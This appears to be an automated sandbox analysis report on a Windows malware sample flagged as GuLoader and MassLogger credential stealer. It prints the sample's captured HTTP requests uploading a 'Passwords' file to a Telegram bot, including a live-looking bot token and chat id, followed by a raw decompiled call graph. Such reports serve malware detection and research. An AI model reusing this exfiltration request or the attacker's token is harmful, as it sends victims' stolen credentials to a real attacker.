                                                                                                            2025-01-10 20:50:45 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44724,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542245,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.1050021149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:46 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd357a39180a7a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 37 61 33 39 31 38 30 61 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd357a39180a7aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:47 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:47 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:47 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44725,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542247,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.1050023149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:51 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd35ba44deab09
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 62 61 34 34 64 65 61 62 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd35ba44deab09Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:52 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:52 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:52 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44726,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542252,"document":{"file_name":"U


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:15:48:42
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\6mGpn6kupm.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'002'919 bytes
                                                                                                            MD5 hash:89BB4EEAB81B80681733B2D7DF68289B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1714407995.00000000051B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:15:49:24
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\6mGpn6kupm.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'002'919 bytes
                                                                                                            MD5 hash:89BB4EEAB81B80681733B2D7DF68289B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:20%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:19.9%
                                                                                                              Total number of Nodes:1570
                                                                                                              Total number of Limit Nodes:39
                                                                                                              execution_graph 4127 401941 4128 401943 4127->4128 4133 402c41 4128->4133 4134 402c4d 4133->4134 4179 40640a 4134->4179 4137 401948 4139 405afa 4137->4139 4221 405dc5 4139->4221 4142 405b22 DeleteFileW 4144 401951 4142->4144 4143 405b39 4145 405c64 4143->4145 4235 4063e8 lstrcpynW 4143->4235 4145->4144 4264 40672b FindFirstFileW 4145->4264 4147 405b5f 4148 405b72 4147->4148 4149 405b65 lstrcatW 4147->4149 4236 405d09 lstrlenW 4148->4236 4150 405b78 4149->4150 4153 405b88 lstrcatW 4150->4153 4154 405b7e 4150->4154 4157 405b93 lstrlenW FindFirstFileW 4153->4157 4154->4153 4154->4157 4156 405c82 4267 405cbd lstrlenW CharPrevW 4156->4267 4159 405c59 4157->4159 4168 405bb5 4157->4168 4159->4145 4161 405c3c FindNextFileW 4165 405c52 FindClose 4161->4165 4161->4168 4162 405ab2 5 API calls 4164 405c94 4162->4164 4166 405c98 4164->4166 4167 405cae 4164->4167 4165->4159 4166->4144 4171 405450 24 API calls 4166->4171 4170 405450 24 API calls 4167->4170 4168->4161 4172 405afa 60 API calls 4168->4172 4174 405450 24 API calls 4168->4174 4240 4063e8 lstrcpynW 4168->4240 4241 405ab2 4168->4241 4249 405450 4168->4249 4260 4061ae MoveFileExW 4168->4260 4170->4144 4173 405ca5 4171->4173 4172->4168 4175 4061ae 36 API calls 4173->4175 4174->4161 4176 405cac 4175->4176 4176->4144 4187 406417 4179->4187 4180 406662 4181 402c6e 4180->4181 4212 4063e8 lstrcpynW 4180->4212 4181->4137 4196 40667c 4181->4196 4183 406630 lstrlenW 4183->4187 4184 40640a 10 API calls 4184->4183 4187->4180 4187->4183 4187->4184 4189 406545 GetSystemDirectoryW 4187->4189 4190 406558 GetWindowsDirectoryW 4187->4190 4191 40667c 5 API calls 4187->4191 4192 40640a 10 API calls 4187->4192 4193 4065d3 lstrcatW 4187->4193 4194 40658c SHGetSpecialFolderLocation 4187->4194 4205 4062b6 4187->4205 4210 40632f wsprintfW 4187->4210 4211 4063e8 lstrcpynW 4187->4211 4189->4187 4190->4187 4191->4187 4192->4187 4193->4187 4194->4187 4195 4065a4 SHGetPathFromIDListW CoTaskMemFree 4194->4195 4195->4187 4197 406689 4196->4197 4199 4066f2 CharNextW 4197->4199 4202 4066ff 4197->4202 4203 4066de CharNextW 4197->4203 4204 4066ed CharNextW 4197->4204 4217 405cea 4197->4217 4198 406704 CharPrevW 4198->4202 4199->4197 4199->4202 4200 406725 4200->4137 4202->4198 4202->4200 4203->4197 4204->4199 4213 406255 4205->4213 4208 40631a 4208->4187 4209 4062ea RegQueryValueExW RegCloseKey 4209->4208 4210->4187 4211->4187 4212->4181 4214 406264 4213->4214 4215 406268 4214->4215 4216 40626d RegOpenKeyExW 4214->4216 4215->4208 4215->4209 4216->4215 4218 405cf0 4217->4218 4219 405d06 4218->4219 4220 405cf7 CharNextW 4218->4220 4219->4197 4220->4218 4270 4063e8 lstrcpynW 4221->4270 4223 405dd6 4271 405d68 CharNextW CharNextW 4223->4271 4226 405b1a 4226->4142 4226->4143 4227 40667c 5 API calls 4233 405dec 4227->4233 4228 405e1d lstrlenW 4229 405e28 4228->4229 4228->4233 4230 405cbd 3 API calls 4229->4230 4232 405e2d GetFileAttributesW 4230->4232 4231 40672b 2 API calls 4231->4233 4232->4226 4233->4226 4233->4228 4233->4231 4234 405d09 2 API calls 4233->4234 4234->4228 4235->4147 4237 405d17 4236->4237 4238 405d29 4237->4238 4239 405d1d CharPrevW 4237->4239 4238->4150 4239->4237 4239->4238 4240->4168 4277 405eb9 GetFileAttributesW 4241->4277 4244 405adf 4244->4168 4245 405ad5 DeleteFileW 4247 405adb 4245->4247 4246 405acd RemoveDirectoryW 4246->4247 4247->4244 4248 405aeb SetFileAttributesW 4247->4248 4248->4244 4250 40546b 4249->4250 4259 40550d 4249->4259 4251 405487 lstrlenW 4250->4251 4252 40640a 17 API calls 4250->4252 4253 4054b0 4251->4253 4254 405495 lstrlenW 4251->4254 4252->4251 4256 4054c3 4253->4256 4257 4054b6 SetWindowTextW 4253->4257 4255 4054a7 lstrcatW 4254->4255 4254->4259 4255->4253 4258 4054c9 SendMessageW SendMessageW SendMessageW 4256->4258 4256->4259 4257->4256 4258->4259 4259->4168 4261 4061cf 4260->4261 4262 4061c2 4260->4262 4261->4168 4280 406034 4262->4280 4265 406741 FindClose 4264->4265 4266 405c7e 4264->4266 4265->4266 4266->4144 4266->4156 4268 405c88 4267->4268 4269 405cd9 lstrcatW 4267->4269 4268->4162 4269->4268 4270->4223 4272 405d85 4271->4272 4275 405d97 4271->4275 4274 405d92 CharNextW 4272->4274 4272->4275 4273 405dbb 4273->4226 4273->4227 4274->4273 4275->4273 4276 405cea CharNextW 4275->4276 4276->4275 4278 405abe 4277->4278 4279 405ecb SetFileAttributesW 4277->4279 4278->4244 4278->4245 4278->4246 4279->4278 4281 406064 4280->4281 4282 40608a GetShortPathNameW 4280->4282 4307 405ede GetFileAttributesW CreateFileW 4281->4307 4283 4061a9 4282->4283 4284 40609f 4282->4284 4283->4261 4284->4283 4286 4060a7 wsprintfA 4284->4286 4288 40640a 17 API calls 4286->4288 4287 40606e CloseHandle GetShortPathNameW 4287->4283 4289 406082 4287->4289 4290 4060cf 4288->4290 4289->4282 4289->4283 4308 405ede GetFileAttributesW CreateFileW 4290->4308 4292 4060dc 4292->4283 4293 4060eb GetFileSize GlobalAlloc 4292->4293 4294 4061a2 CloseHandle 4293->4294 4295 40610d 4293->4295 4294->4283 4309 405f61 ReadFile 4295->4309 4300 406140 4302 405e43 4 API calls 4300->4302 4301 40612c lstrcpyA 4303 40614e 4301->4303 4302->4303 4304 406185 SetFilePointer 4303->4304 4316 405f90 WriteFile 4304->4316 4307->4287 4308->4292 4310 405f7f 4309->4310 4310->4294 4311 405e43 lstrlenA 4310->4311 4312 405e84 lstrlenA 4311->4312 4313 405e8c 4312->4313 4314 405e5d lstrcmpiA 4312->4314 4313->4300 4313->4301 4314->4313 4315 405e7b CharNextA 4314->4315 4315->4312 4317 405fae GlobalFree 4316->4317 4317->4294 4318 4015c1 4319 402c41 17 API calls 4318->4319 4320 4015c8 4319->4320 4321 405d68 4 API calls 4320->4321 4333 4015d1 4321->4333 4322 401631 4324 401663 4322->4324 4325 401636 4322->4325 4323 405cea CharNextW 4323->4333 4327 401423 24 API calls 4324->4327 4345 401423 4325->4345 4335 40165b 4327->4335 4332 40164a SetCurrentDirectoryW 4332->4335 4333->4322 4333->4323 4334 401617 GetFileAttributesW 4333->4334 4337 4059b9 4333->4337 4340 40591f CreateDirectoryW 4333->4340 4349 40599c CreateDirectoryW 4333->4349 4334->4333 4352 4067c2 GetModuleHandleA 4337->4352 4341 405970 GetLastError 4340->4341 4342 40596c 4340->4342 4341->4342 4343 40597f SetFileSecurityW 4341->4343 4342->4333 4343->4342 4344 405995 GetLastError 4343->4344 4344->4342 4346 405450 24 API calls 4345->4346 4347 401431 4346->4347 4348 4063e8 lstrcpynW 4347->4348 4348->4332 4350 4059b0 GetLastError 4349->4350 4351 4059ac 4349->4351 4350->4351 4351->4333 4353 4067e8 GetProcAddress 4352->4353 4354 4067de 4352->4354 4356 4059c0 4353->4356 4358 406752 GetSystemDirectoryW 4354->4358 4356->4333 4357 4067e4 4357->4353 4357->4356 4360 406774 wsprintfW LoadLibraryExW 4358->4360 4360->4357 4361 4053c4 4362 4053d4 4361->4362 4363 4053e8 4361->4363 4365 405431 4362->4365 4366 4053da 4362->4366 4364 4053f0 IsWindowVisible 4363->4364 4373 405410 4363->4373 4364->4365 4367 4053fd 4364->4367 4368 405436 CallWindowProcW 4365->4368 4375 4043ab 4366->4375 4378 404d1a SendMessageW 4367->4378 4371 4053e4 4368->4371 4373->4368 4383 404d9a 4373->4383 4376 4043c3 4375->4376 4377 4043b4 SendMessageW 4375->4377 4376->4371 4377->4376 4379 404d79 SendMessageW 4378->4379 4380 404d3d GetMessagePos ScreenToClient SendMessageW 4378->4380 4381 404d71 4379->4381 4380->4381 4382 404d76 4380->4382 4381->4373 4382->4379 4392 4063e8 lstrcpynW 4383->4392 4385 404dad 4393 40632f wsprintfW 4385->4393 4387 404db7 4394 40140b 4387->4394 4391 404dc7 4391->4365 4392->4385 4393->4387 4398 401389 4394->4398 4397 4063e8 lstrcpynW 4397->4391 4400 401390 4398->4400 4399 4013fe 4399->4397 4400->4399 4401 4013cb MulDiv SendMessageW 4400->4401 4401->4400 4846 401e49 4847 402c1f 17 API calls 4846->4847 4848 401e4f 4847->4848 4849 402c1f 17 API calls 4848->4849 4850 401e5b 4849->4850 4851 401e72 EnableWindow 4850->4851 4852 401e67 ShowWindow 4850->4852 4853 402ac5 4851->4853 4852->4853 4854 40264a 4855 402c1f 17 API calls 4854->4855 4856 402659 4855->4856 4857 4026a3 ReadFile 4856->4857 4858 40273c 4856->4858 4859 405f61 ReadFile 4856->4859 4861 4026e3 MultiByteToWideChar 4856->4861 4862 402798 4856->4862 4864 402709 SetFilePointer MultiByteToWideChar 4856->4864 4865 4027a9 4856->4865 4867 402796 4856->4867 4857->4856 4857->4867 4858->4856 4858->4867 4868 405fbf SetFilePointer 4858->4868 4859->4856 4861->4856 4877 40632f wsprintfW 4862->4877 4864->4856 4866 4027ca SetFilePointer 4865->4866 4865->4867 4866->4867 4869 405ff3 4868->4869 4870 405fdb 4868->4870 4869->4858 4871 405f61 ReadFile 4870->4871 4872 405fe7 4871->4872 4872->4869 4873 406024 SetFilePointer 4872->4873 4874 405ffc SetFilePointer 4872->4874 4873->4869 4874->4873 4875 406007 4874->4875 4876 405f90 WriteFile 4875->4876 4876->4869 4877->4867 4878 404dcc GetDlgItem GetDlgItem 4879 404e1e 7 API calls 4878->4879 4886 405037 4878->4886 4880 404ec1 DeleteObject 4879->4880 4881 404eb4 SendMessageW 4879->4881 4882 404eca 4880->4882 4881->4880 4883 404ed9 4882->4883 4884 404f01 4882->4884 4885 40640a 17 API calls 4883->4885 4888 40435f 18 API calls 4884->4888 4891 404ee3 SendMessageW SendMessageW 4885->4891 4887 4050fc 4886->4887 4890 40511b 4886->4890 4894 405097 4886->4894 4887->4890 4898 40510d SendMessageW 4887->4898 4895 404f15 4888->4895 4889 4051c7 4892 4051d1 SendMessageW 4889->4892 4893 4051d9 4889->4893 4890->4889 4896 4053af 4890->4896 4901 405174 SendMessageW 4890->4901 4891->4882 4892->4893 4903 4051f2 4893->4903 4904 4051eb ImageList_Destroy 4893->4904 4916 405202 4893->4916 4899 404d1a 5 API calls 4894->4899 4900 40435f 18 API calls 4895->4900 4897 4043c6 8 API calls 4896->4897 4902 4053bd 4897->4902 4898->4890 4914 4050a8 4899->4914 4915 404f23 4900->4915 4901->4896 4906 405189 SendMessageW 4901->4906 4907 4051fb GlobalFree 4903->4907 4903->4916 4904->4903 4905 405371 4905->4896 4910 405383 ShowWindow GetDlgItem ShowWindow 4905->4910 4909 40519c 4906->4909 4907->4916 4908 404ff8 GetWindowLongW SetWindowLongW 4911 405011 4908->4911 4917 4051ad SendMessageW 4909->4917 4910->4896 4912 405017 ShowWindow 4911->4912 4913 40502f 4911->4913 4934 404394 SendMessageW 4912->4934 4935 404394 SendMessageW 4913->4935 4914->4887 4915->4908 4918 404ff2 4915->4918 4921 404f73 SendMessageW 4915->4921 4922 404fc0 SendMessageW 4915->4922 4923 404faf SendMessageW 4915->4923 4916->4905 4924 404d9a 4 API calls 4916->4924 4929 40523d 4916->4929 4917->4889 4918->4908 4918->4911 4921->4915 4922->4915 4923->4915 4924->4929 4925 40502a 4925->4896 4926 405347 InvalidateRect 4926->4905 4927 40535d 4926->4927 4936 404cd5 4927->4936 4928 40526b SendMessageW 4930 405281 4928->4930 4929->4928 4929->4930 4930->4926 4931 4052e2 4930->4931 4933 4052f5 SendMessageW SendMessageW 4930->4933 4931->4933 4933->4930 4934->4925 4935->4886 4939 404c0c 4936->4939 4938 404cea 4938->4905 4940 404c25 4939->4940 4941 40640a 17 API calls 4940->4941 4942 404c89 4941->4942 4943 40640a 17 API calls 4942->4943 4944 404c94 4943->4944 4945 40640a 17 API calls 4944->4945 4946 404caa lstrlenW wsprintfW SetDlgItemTextW 4945->4946 4946->4938 5278 4016cc 5279 402c41 17 API calls 5278->5279 5280 4016d2 GetFullPathNameW 5279->5280 5281 40170e 5280->5281 5282 4016ec 5280->5282 5283 401723 GetShortPathNameW 5281->5283 5284 402ac5 5281->5284 5282->5281 5285 40672b 2 API calls 5282->5285 5283->5284 5286 4016fe 5285->5286 5286->5281 5288 4063e8 lstrcpynW 5286->5288 5288->5281 5289 40234e 5290 402c41 17 API calls 5289->5290 5291 40235d 5290->5291 5292 402c41 17 API calls 5291->5292 5293 402366 5292->5293 5294 402c41 17 API calls 5293->5294 5295 402370 GetPrivateProfileStringW 5294->5295 5018 701c2993 5019 701c29e3 5018->5019 5020 701c29a3 VirtualProtect 5018->5020 5020->5019 5296 4044cf lstrlenW 5297 4044f0 WideCharToMultiByte 5296->5297 5298 4044ee 5296->5298 5298->5297 5299 404850 5300 40487c 5299->5300 5301 40488d 5299->5301 5360 405a32 GetDlgItemTextW 5300->5360 5303 404899 GetDlgItem 5301->5303 5335 4048f8 5301->5335 5308 4048ad 5303->5308 5304 404887 5305 40667c 5 API calls 5304->5305 5305->5301 5306 4049dc 5309 404b8b 5306->5309 5362 405a32 GetDlgItemTextW 5306->5362 5307 4048c1 SetWindowTextW 5311 40435f 18 API calls 5307->5311 5308->5307 5315 405d68 4 API calls 5308->5315 5314 4043c6 8 API calls 5309->5314 5316 4048dd 5311->5316 5312 40640a 17 API calls 5317 40496c SHBrowseForFolderW 5312->5317 5313 404a0c 5318 405dc5 18 API calls 5313->5318 5319 404b9f 5314->5319 5320 4048b7 5315->5320 5321 40435f 18 API calls 5316->5321 5317->5306 5322 404984 CoTaskMemFree 5317->5322 5323 404a12 5318->5323 5320->5307 5326 405cbd 3 API calls 5320->5326 5324 4048eb 5321->5324 5325 405cbd 3 API calls 5322->5325 5363 4063e8 lstrcpynW 5323->5363 5361 404394 SendMessageW 5324->5361 5328 404991 5325->5328 5326->5307 5331 4049c8 SetDlgItemTextW 5328->5331 5336 40640a 17 API calls 5328->5336 5330 4048f1 5333 4067c2 5 API calls 5330->5333 5331->5306 5332 404a29 5334 4067c2 5 API calls 5332->5334 5333->5335 5343 404a30 5334->5343 5335->5306 5335->5309 5335->5312 5337 4049b0 lstrcmpiW 5336->5337 5337->5331 5340 4049c1 lstrcatW 5337->5340 5338 404a71 5364 4063e8 lstrcpynW 5338->5364 5340->5331 5341 404a78 5342 405d68 4 API calls 5341->5342 5344 404a7e GetDiskFreeSpaceW 5342->5344 5343->5338 5346 405d09 2 API calls 5343->5346 5348 404ac9 5343->5348 5347 404aa2 MulDiv 5344->5347 5344->5348 5346->5343 5347->5348 5349 404b3a 5348->5349 5350 404cd5 20 API calls 5348->5350 5351 404b5d 5349->5351 5353 40140b 2 API calls 5349->5353 5352 404b27 5350->5352 5365 404381 EnableWindow 5351->5365 5355 404b3c SetDlgItemTextW 5352->5355 5356 404b2c 5352->5356 5353->5351 5355->5349 5358 404c0c 20 API calls 5356->5358 5357 404b79 5357->5309 5366 4047a9 5357->5366 5358->5349 5360->5304 5361->5330 5362->5313 5363->5332 5364->5341 5365->5357 5367 4047b7 5366->5367 5368 4047bc SendMessageW 5366->5368 5367->5368 5368->5309 5369 401b53 5370 402c41 17 API calls 5369->5370 5371 401b5a 5370->5371 5372 402c1f 17 API calls 5371->5372 5373 401b63 wsprintfW 5372->5373 5374 402ac5 5373->5374 5375 401956 5376 402c41 17 API calls 5375->5376 5377 40195d lstrlenW 5376->5377 5378 402592 5377->5378 5379 406ed6 5383 406976 5379->5383 5380 4072e1 5381 406a00 GlobalAlloc 5381->5380 5381->5383 5382 4069f7 GlobalFree 5382->5381 5383->5380 5383->5381 5383->5382 5383->5383 5384 406a77 GlobalAlloc 5383->5384 5385 406a6e GlobalFree 5383->5385 5384->5380 5384->5383 5385->5384 5386 4014d7 5387 402c1f 17 API calls 5386->5387 5388 4014dd Sleep 5387->5388 5390 402ac5 5388->5390 5391 401f58 5392 402c41 17 API calls 5391->5392 5393 401f5f 5392->5393 5394 40672b 2 API calls 5393->5394 5395 401f65 5394->5395 5397 401f76 5395->5397 5398 40632f wsprintfW 5395->5398 5398->5397 5399 402259 5400 402c41 17 API calls 5399->5400 5401 40225f 5400->5401 5402 402c41 17 API calls 5401->5402 5403 402268 5402->5403 5404 402c41 17 API calls 5403->5404 5405 402271 5404->5405 5406 40672b 2 API calls 5405->5406 5407 40227a 5406->5407 5408 40228b lstrlenW lstrlenW 5407->5408 5413 40227e 5407->5413 5410 405450 24 API calls 5408->5410 5409 405450 24 API calls 5412 402286 5409->5412 5411 4022c9 SHFileOperationW 5410->5411 5411->5412 5411->5413 5413->5409 5269 40175c 5270 402c41 17 API calls 5269->5270 5271 401763 5270->5271 5272 405f0d 2 API calls 5271->5272 5273 40176a 5272->5273 5274 405f0d 2 API calls 5273->5274 5274->5273 5414 701c1000 5417 701c101b 5414->5417 5424 701c1516 5417->5424 5419 701c1020 5420 701c1027 GlobalAlloc 5419->5420 5421 701c1024 5419->5421 5420->5421 5422 701c153d 3 API calls 5421->5422 5423 701c1019 5422->5423 5425 701c151c 5424->5425 5426 701c1522 5425->5426 5427 701c152e GlobalFree 5425->5427 5426->5419 5427->5419 5428 401d5d GetDlgItem GetClientRect 5429 402c41 17 API calls 5428->5429 5430 401d8f LoadImageW SendMessageW 5429->5430 5431 